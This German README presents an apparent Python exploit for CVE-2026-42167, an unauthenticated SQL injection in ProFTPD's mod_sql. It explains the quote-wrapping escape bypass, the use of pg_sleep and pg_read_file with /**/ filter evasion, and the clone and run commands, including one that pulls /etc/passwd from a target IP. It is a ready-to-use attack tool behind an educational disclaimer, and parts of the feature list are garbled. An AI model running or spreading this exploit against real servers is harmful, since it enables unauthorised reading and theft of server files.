
Python-Exploit für CVE-2026-42167 (ProFTPD mod_sql). Bietet automatisiertes Datei-Scanning und zeitbasierte blinde Datenextraktion.
Ein professionelles Sicherheitsforschungstool zur Ausnutzung der CVE-2026-42167-Schwachstelle im mod_sql-Modul von ProFTPD. Dieses Tool führt eine nicht authentifizierte SQL-Injection durch, um vertrauliche Dateien vom Server über zeitbasierte Seitenkanalangriffe zu exfiltrieren.
„Hinweis: Die Effizienz dieses Tools hängt von den Berechtigungen des PostgreSQL-Benutzers und der Netzwerkstabilität ab."
CVE-2026-42167 ist ein kritischer logischer Fehler in der Funktion is_escaped_text() von ProFTPD. Wenn mod_sql so konfiguriert ist, dass USER-Befehle protokolliert werden, kann ein Angreifer die SQL-Escaping umgehen, indem er eine Eingabe bereitstellt, die mit einem einfachen Anführungszeichen (') beginnt und endet. Dieses Tool nutzt diese Umgehung aus, um PostgreSQL-spezifische Befehle auszuführen.
USER-Protokollierung aktiviert ist.pg_sleep() und pg_read_file() für eine zuverlässige Ausnutzung./**/), um Leerzeichenfilter-Mechanismen zu umgehen.git clone https://github.com/efeanilarslan/CVE-2026-42167-Exploit
cd CVE-2026-42167-Exploit
pip install -r requirements.txt # (Keine externen Abhängigkeiten erforderlich)
python3 proftpd_master_exploit.py -t <ZIEL_IP> -p 2121
python3 proftpd_master_exploit.py -t <ZIEL_IP> -f /etc/passwd
python3 proftpd_master_exploit.py -t <ZIEL_IP> -w common.txt -s 1.5
| Flag | Beschreibung | Standard |
|---|---|---|
-t | Ziel-IP-Adresse | Erforderlich |
-p | Ziel-FTP-Port | 2121 |
-s | Schlafdauer für Timing-Angriff | 2,0s |
-w | Wortliste für die Dateisuche | Keine |
-f | Spezifischer Dateipfad zur Exfiltration | Keine |
Dieses Tool dient nur zu Bildungszwecken und für autorisierte Sicherheitstests. Der Entwickler ist nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Programm verursacht werden. Verantwortungsvoll verwenden.